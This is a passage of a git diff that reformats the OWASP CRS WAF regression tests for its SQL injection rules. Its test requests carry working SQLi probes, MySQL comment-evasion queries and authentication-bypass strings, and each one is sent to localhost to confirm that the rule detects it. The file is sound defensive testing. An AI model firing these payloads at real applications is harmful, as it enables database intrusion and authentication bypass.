port: 80 - uri: "/post" - data: "`>65" - version: HTTP/1.0 - output: - log_contains: id "942490" - - test_title: 942490-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "`>65" + version: HTTP/1.0 + output: + log: + expect_ids: [942490] + - test_id: 5 desc: "classic SQL injection probings 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay='1001'='10" - version: HTTP/1.0 - output: - log_contains: id "942490" - - test_title: 942490-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay='1001'='10" + version: HTTP/1.0 + output: + log: + expect_ids: [942490] + - test_id: 6 desc: "classic SQL injection probings 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "\"2562*23" - version: HTTP/1.0 - output: - log_contains: id "942490" - - test_title: 942490-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "\"2562*23" + version: HTTP/1.0 + output: + log: + expect_ids: [942490] + - test_id: 7 desc: "classic SQL injection probings 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=\":[\"00" - version: HTTP/1.0 - output: - log_contains: id "942490" - - test_title: 942490-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=\":[\"00" + version: HTTP/1.0 + output: + log: + expect_ids: [942490] + - test_id: 8 desc: "classic SQL injection probings 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=`>6fbdec2" - version: HTTP/1.0 - output: - log_contains: id "942490" - - test_title: 942490-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=`>6fbdec2" + version: HTTP/1.0 + output: + log: + expect_ids: [942490] + - test_id: 9 desc: "classic SQL injection probings 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay='][0]]), strtolower($b[$GLOBALS['" - version: HTTP/1.0 - output: - log_contains: id "942490" - - test_title: 942490-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay='][0]]), strtolower($b[$GLOBALS['" + version: HTTP/1.0 + output: + log: + expect_ids: [942490] + - test_id: 10 desc: "classic SQL injection probings 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=', 2, 1" - version: HTTP/1.0 - output: - log_contains: id "942490" - - test_title: 942490-11 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=', 2, 1" + version: HTTP/1.0 + output: + log: + expect_ids: [942490] + - test_id: 11 desc: "classic SQL injection probings 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "`>9e7" - version: HTTP/1.0 - output: - log_contains: id "942490" - - test_title: 942490-12 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "`>9e7" + version: HTTP/1.0 + output: + log: + expect_ids: [942490] + - test_id: 12 desc: "classic SQL injection probings 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=\":\"65" - version: HTTP/1.0 - output: - log_contains: id "942490" - - test_title: 942490-13 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=\":\"65" + version: HTTP/1.0 + output: + log: + expect_ids: [942490] + - test_id: 13 desc: "classic SQL injection probings 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay='\\2nq5" - version: HTTP/1.0 - output: - log_contains: id "942490" - - test_title: 942490-14 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay='\\2nq5" + version: HTTP/1.0 + output: + log: + expect_ids: [942490] + - test_id: 14 desc: "classic SQL injection probings 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=` < 0) AND `" - version: HTTP/1.0 - output: - log_contains: id "942490" - - test_title: 942490-15 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=` < 0) AND `" + version: HTTP/1.0 + output: + log: + expect_ids: [942490] + - test_id: 15 desc: "classic SQL injection probings 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay='0:0:6" - version: HTTP/1.0 - output: - log_contains: id "942490" - - test_title: 942490-16 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay='0:0:6" + version: HTTP/1.0 + output: + log: + expect_ids: [942490] + - test_id: 16 desc: "classic SQL injection probings 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "\":60" - version: HTTP/1.0 - output: - log_contains: id "942490" - - test_title: 942490-17 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "\":60" + version: HTTP/1.0 + output: + log: + expect_ids: [942490] + - test_id: 17 desc: "classic SQL injection probings 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=\">%5 - type_submit_reset_5" - version: HTTP/1.0 - output: - log_contains: id "942490" - - test_title: 942490-18 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=\">%5 - type_submit_reset_5" + version: HTTP/1.0 + output: + log: + expect_ids: [942490] + - test_id: 18 desc: "classic SQL injection probings 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "\":35" - version: HTTP/1.0 - output: - log_contains: id "942490" - - test_title: 942490-19 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "\":35" + version: HTTP/1.0 + output: + log: + expect_ids: [942490] + - test_id: 19 desc: "classic SQL injection probings 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay='3085'='30" - version: HTTP/1.0 - output: - log_contains: id "942490" - - test_title: 942490-20 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay='3085'='30" + version: HTTP/1.0 + output: + log: + expect_ids: [942490] + - test_id: 20 desc: "classic SQL injection probings 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "\":\"[0,\\x22" - version: HTTP/1.0 - output: - log_contains: id "942490" - - test_title: 942490-21 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "\":\"[0,\\x22" + version: HTTP/1.0 + output: + log: + expect_ids: [942490] + - test_id: 21 desc: "classic SQL injection probings 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay='16/17" - version: HTTP/1.0 - output: - log_contains: id "942490" - - test_title: 942490-22 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay='16/17" + version: HTTP/1.0 + output: + log: + expect_ids: [942490] + - test_id: 22 desc: "classic SQL injection probings 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "\";}7b6" - version: HTTP/1.0 - output: - log_contains: id "942490" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "\";}7b6" + version: HTTP/1.0 + output: + log: + expect_ids: [942490] diff --git a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942500.yaml b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942500.yaml index 8c92f87..54e1480 100644 --- a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942500.yaml +++ b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942500.yaml @@ -2,86 +2,85 @@ meta: author: "Franziska Buehler, Max Leske, azurit" description: "Detection of MySQL injection evasion attempts using special comments" - enabled: true - name: 942500.yaml +rule_id: 942500 tests: - - test_title: 942500-1 + - test_id: 1 desc: "Use of portability comment (/*!...*/) as evasion technique" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?id=9999+or+{if+length((/*!5000select+username/*!50000from*/user+where+id=1))>0}" - version: HTTP/1.0 - output: - log_contains: id "942500" - - test_title: 942500-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?id=9999+or+{if+length((/*!5000select+username/*!50000from*/user+where+id=1))>0}" + version: HTTP/1.0 + output: + log: + expect_ids: [942500] + - test_id: 2 desc: "Use of portability comment (/*!...*/) as evasion technique, with space before !" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?id=9999+or+{if+length((/*+!5000select+username/*!50000from*/user+where+id=1))>0}" - version: HTTP/1.0 - output: - log_contains: id "942500" - - test_title: 942500-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?id=9999+or+{if+length((/*+!5000select+username/*!50000from*/user+where+id=1))>0}" + version: HTTP/1.0 + output: + log: + expect_ids: [942500] + - test_id: 3 desc: "Use of optimizer hints (/*+...*/) as evasion technique" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?test=9999+or+%2F*%2Boptimizer+hint+*%2F+true" - version: "HTTP/1.1" - output: - log_contains: id "942500" - - test_title: 942500-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?test=9999+or+%2F*%2Boptimizer+hint+*%2F+true" + version: "HTTP/1.1" + output: + log: + expect_ids: [942500] + - test_id: 4 desc: "Use of optimizer hints (/*+...*/) as evasion technique with space before +" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?test=9999+or+%2F*+%2Boptimizer+hint+*%2F+true" - version: "HTTP/1.1" - output: - log_contains: id "942500" - - test_title: 942500-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?test=9999+or+%2F*+%2Boptimizer+hint+*%2F+true" + version: "HTTP/1.1" + output: + log: + expect_ids: [942500] + - test_id: 5 desc: "Status Page Test - MySQL inline comment detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?test=9999+or+{if+length((/*!5000select+username/*!comment*/" - version: HTTP/1.0 - output: - log_contains: id "942500" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?test=9999+or+{if+length((/*!5000select+username/*!comment*/" + version: HTTP/1.0 + output: + log: + expect_ids: [942500] diff --git a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942510.yaml b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942510.yaml index ddf211c..6228849 100644 --- a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942510.yaml +++ b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942510.yaml @@ -1,39 +1,37 @@ --- meta: author: "Franziska Buehler, azurit" - description: None - enabled: true - name: 942510.yaml +rule_id: 942510 tests: - - test_title: 942510-1 + - test_id: 1 desc: "SQLi bypass detected: backticks" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?`bla`" - version: HTTP/1.0 - output: - log_contains: id "942510" - - test_title: 942510-2 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?`bla`" + version: HTTP/1.0 + output: + log: + expect_ids: [942510] + - test_id: 2 desc: "SQLi bypass detected: backticks" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?'bla'" - version: HTTP/1.0 - output: - no_log_contains: id "942510" + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?'bla'" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942510] diff --git a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942511.yaml b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942511.yaml index 9cf2ca3..a2096cc 100644 --- a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942511.yaml +++ b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942511.yaml @@ -1,39 +1,37 @@ --- meta: author: "Walter Hop, azurit" - description: None - enabled: true - name: 942511.yaml +rule_id: 942511 tests: - - test_title: 942511-1 + - test_id: 1 desc: "SQLi bypass detected: quotes" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?`bla`" - version: HTTP/1.0 - output: - no_log_contains: id "942511" - - test_title: 942511-2 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?`bla`" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942511] + - test_id: 2 desc: "SQLi bypass detected: quotes" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?'bla'" - version: HTTP/1.0 - output: - log_contains: id "942511" + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?'bla'" + version: HTTP/1.0 + output: + log: + expect_ids: [942511] diff --git a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942520.yaml b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942520.yaml index 79f614b..be7dd03 100644 --- a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942520.yaml +++ b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942520.yaml @@ -2,409 +2,408 @@ meta: author: "terjanq, Franziska Bühler, azurit" description: "Detects basic SQL authentication bypass attempts 4.0/4" - enabled: true - name: 942520.yaml +rule_id: 942520 tests: - - test_title: 942520-1 + - test_id: 1 desc: "Detects basic SQL auth bypass with 'is not something'" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=id'is%20not-id--" - version: HTTP/1.0 - output: - log_contains: id "942520" - - test_title: 942520-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=id'is%20not-id--" + version: HTTP/1.0 + output: + log: + expect_ids: [942520] + - test_id: 2 desc: "Negative test: 'is notes" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=id'is%20notes" - version: HTTP/1.0 - output: - no_log_contains: id "942520" - - test_title: 942520-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=id'is%20notes" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942520] + - test_id: 3 desc: "Detects basic SQL auth bypass with 'not like something'" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=id'not%20like%20id--" - version: HTTP/1.0 - output: - log_contains: id "942520" - - test_title: 942520-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=id'not%20like%20id--" + version: HTTP/1.0 + output: + log: + expect_ids: [942520] + - test_id: 4 desc: "Detects basic SQL auth bypass with 'not glob'" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=id'not%20glob-id--" - version: HTTP/1.0 - output: - log_contains: id "942520" - - test_title: 942520-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=id'not%20glob-id--" + version: HTTP/1.0 + output: + log: + expect_ids: [942520] + - test_id: 5 desc: "Detects basic SQL auth bypass with 'not like glob'" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=id'not%20glob-id--" - version: HTTP/1.0 - output: - log_contains: id "942520" - - test_title: 942520-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=id'not%20glob-id--" + version: HTTP/1.0 + output: + log: + expect_ids: [942520] + - test_id: 6 desc: "Detects basic SQL auth bypass with binary operators" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - # x'|email-- - data: "var=x'%7Cemail--" - version: HTTP/1.0 - output: - log_contains: id "942520" - - test_title: 942520-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + # x'|email-- + data: "var=x'%7Cemail--" + version: HTTP/1.0 + output: + log: + expect_ids: [942520] + - test_id: 7 desc: "Detects basic SQL auth bypass with binary operators" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - # x'-email-- - data: "var=x'-email--" - version: HTTP/1.0 - output: - log_contains: id "942520" - - test_title: 942520-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + # x'-email-- + data: "var=x'-email--" + version: HTTP/1.0 + output: + log: + expect_ids: [942520] + - test_id: 8 desc: "Detects basic SQL auth bypass with binary operators" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - # x'+email-- (there seem to be a bug with double encoding in tests) - data: "var=x'%252Bemail--" - version: HTTP/1.0 - output: - log_contains: id "942520" - - test_title: 942520-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 